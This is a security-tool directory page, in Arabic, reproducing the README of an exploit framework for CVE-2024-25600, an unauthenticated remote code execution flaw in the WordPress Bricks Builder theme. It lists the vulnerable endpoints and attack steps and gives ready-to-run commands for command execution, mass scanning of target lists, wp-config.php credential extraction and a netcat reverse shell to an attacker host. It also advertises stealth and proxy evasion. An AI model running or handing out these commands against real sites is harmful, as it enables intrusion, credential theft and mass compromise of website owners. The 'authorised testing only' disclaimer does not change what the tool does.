Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - استغلال RCE غير مصادق عليه لقالب Bricks Builder في WordPress. إطار استغلال متقدم مع صدفة تفاعلية، وصدفات عكسية، ورفع/تنزيل ملفات، وفحص غير متزامن، ووضع التخفي، ودعم بروكسي، وفحص ثغرات متعدد الخيوط. للاختبار الأمني المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
الاستطلاعماسحات الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تطوير الحمولات
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

CVE-2024-25600 - استغلال RCE غير مصادق عليه لقالب Bricks Builder في WordPress. إطار استغلال متقدم مع صدفة تفاعلية، وصدفات عكسية، ورفع/تنزيل ملفات، وفحص غير متزامن، ووضع التخفي، ودعم بروكسي، وفحص ثغرات متعدد الخيوط. للاختبار الأمني المصرح به فقط.

عرض المستودع
115منذ 2 أشهرلم تتم المراجعة بعد

أداة استغلال BricksRCE

CVE-2024-25600 — ثغرة تنفيذ أوامر عن بعد غير مصادق عليها في قالب ووردبريس Bricks Builder

Python Version CVSS CVE License Platform

أداة تقييم أمني معتمدة لـ CVE-2024-25600
المؤلف: Sudeepa Wanigarathna · الأداة: BricksRCE Exploiter v1.0
السكربت الرئيسي: cve-2024-25600.py

b

[!IMPORTANT] للاستخدام المصرح به فقط. هذه الأداة مخصصة للبحث الأمني والتعليم واختبار الأنظمة التي تملكها أو لديك إذن كتابي صريح لتقييمها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • التثبيت
  • بداية سريعة
  • دليل الاستخدام
  • مرجع الأوامر
  • الصدفة التفاعلية
  • المخرجات والتسجيل
  • استكشاف الأخطاء
  • هيكل المستودع
  • سجل الإصدارات
  • إخلاء المسؤولية
  • المؤلف والإسناد
  • الترخيص

نظرة عامة

CVE-2024-25600 هي ثغرة حرجة لتنفيذ أوامر عن بعد غير مصادق عليها في قالب ووردبريس Bricks Builder. يؤدي التعامل غير السليم مع المدخلات التي يتحكم بها المستخدم في نقطة نهاية REST الخاصة بـ render_element إلى السماح للمهاجمين غير المصادق عليهم بتنفيذ أوامر PHP/نظام عشوائية على التركيبات المتأثرة.

BricksRCE Exploiter (cve-2024-25600.py) هي أداة تقييم بايثون كاملة الميزات لمتخصصي الأمن المصرح لهم من أجل:

  • اكتشاف تركيبات Bricks Builder المعرضة للخطر
  • التحقق من التأثير من خلال تنفيذ أوامر خاضعة للتحكم
  • التفاعل مع المضيفين المخترقين عبر صدفة تفاعلية
  • المسح الجماعي لقوائم الأهداف باستخدام عمال غير متزامنين/مترابطين
  • تصدير النتائج المنظمة للتقارير

تفاصيل الثغرة

السمةالقيمة
معرف CVECVE-2024-25600
CVSS9.8 (حرجة)
متجه الهجومشبكة — غير مصادق عليها
التأثيرتنفيذ أوامر عن بعد بالكامل، اختراق السرية / التكامل / التوفر
المنتج المتأثرقالب ووردبريس Bricks Builder
الإصدارات المتأثرةBricks ≤ 1.9.6 (تم التصحيح في 1.9.6.1+)
نوع الثغرةتنفيذ أوامر عن بعد غير مصادق عليها
CWECWE-94 (التحكم غير السليم في توليد الكود)

نقاط النهاية المتأثرة

نقطة النهايةالطريقة
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

ملخص الهجوم

  1. استخراج nonce من Bricks من شفرة مصدر الصفحة المستهدفة
  2. إرسال طلب render_element مصمم بحمولة عنصر ضارة
  3. يؤدي تقييم الكود من جانب الخادم إلى تنفيذ أوامر عشوائية

المراجع

  • CVE-2024-25600 (MITRE)
  • إدخال NVD
  • سجل تغييرات Bricks Builder / النشرة الأمنية

الميزات

القدرات الأساسية

القدرةالوصف
اكتشاف الثغرةتأكيد RCE من خلال فحص قائم على مؤشر خاضع للتحكم
استخراج nonceاكتشاف nonce متعدد الطرق (البرامج النصية، شفرة المصدر، البيانات الوصفية، REST)
كشف الإصدارتحديد إصدار Bricks Builder من CSS / readme / REST
صدفة تفاعليةREPL كامل مع السجل والإكمال التلقائي ونقل الملفات
وضع الأمر الواحدتنفيذ أمر واحد والخروج (مناسب للنصوص البرمجية)
مساعدات الصدفة العكسيةتوليد صدفة عكسية bash / nc / Python / PHP / Perl / Ruby
استخراج wp-configمحاولة تحديد موقع وقراءة wp-config.php
المسح الجماعيمسح متعدد الأهداف غير متزامن أو مترابط من قائمة URLs

عناصر التحكم التشغيلية

القدرةالوصف
تحديد المعدلتأخير قابل للتكوين بين الطلبات
منطق إعادة المحاولةتراجع أسي في حالات المهلة وأخطاء الاتصال
تدوير User-Agentبصمات متصفح عشوائية لكل طلب
وضع التخفيرؤوس Accept-Language / Accept-Encoding عشوائية
دعم الوكيلHTTP, HTTPS, SOCKS5 / SOCKS5h
نقاط نهاية مزدوجةتفضيل wp-json, rest_route، أو كليهما
وضع القوةتخطي الفحص المسبق ومحاولة الاستغلال مباشرة
واجهة سطر أوامر غنيةأشرطة تقدم، جداول، لوحات ملونة عبر Rich

إعداد التقارير

القدرةالوصف
تصدير JSON / TXTحفظ نتائج المسح والأهداف المعرضة للخطر
سجل الأوامرتسجيل اختياري للأوامر المنفذة
تسجيل الملفاتسجل مستمر bricks_rce.log بالإضافة إلى مسارات سجل مخصصة

التثبيت

المتطلبات الأساسية

  • Python 3.8+
  • pip
  • إمكانية الوصول الشبكي إلى الأهداف المصرح بها

الإعداد

git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

التبعيات

requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # اختياري — دعم وكيل SOCKS5

بداية سريعة

استبدل https://target.example بهدف مختبر أو مصرح به فقط.

# صدفة تفاعلية
python3 cve-2024-25600.py -u https://target.example

# أمر واحد
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# مسح جماعي
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# كشف الإصدار
python3 cve-2024-25600.py -u https://target.example --detect-version

# عبر وكيل Burp
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

دليل الاستخدام

جميع الأمثلة تستخدم السكربت الرئيسي: cve-2024-25600.py

1. إظهار المساعدة

python3 cve-2024-25600.py --help

2. صدفة تفاعلية لهدف واحد

تفتح صدفة RCE تفاعلية بعد تأكيد أن الهدف معرض للخطر.

python3 cve-2024-25600.py -u https://target.example

سير العمل:

  1. توحيد شكل URL والتحقق من صحته
  2. استخراج nonce من الصفحة
  3. التحقق من الثغرة (إلا إذا تم استخدام --force)
  4. الدخول إلى صدفة تفاعلية

3. تنفيذ أمر واحد

python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

حفظ مخرجات الأمر في ملف:

python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. اختيار نوع الحمولة

# الحمولة الافتراضية القائمة على استثناء PHP
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# الحمولة القائمة على system()
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. كشف إصدار Bricks Builder

python3 cve-2024-25600.py -u https://target.example --detect-version

دمجه مع أمر:

python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. استخراج wp-config.php

python3 cve-2024-25600.py -u https://target.example --extract-wp-config

يتم حفظه كـ wp-config_<target>.txt في حالة النجاح.

7. الصداف العكسية (مختبر مصرح به فقط)

# الطرفية 1 — المستمع
nc -lvnp 4444

# الطرفية 2 — صدفة عكسية bash
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

جميع أنواع الصداف العكسية المدعومة:

تنزيل الأداة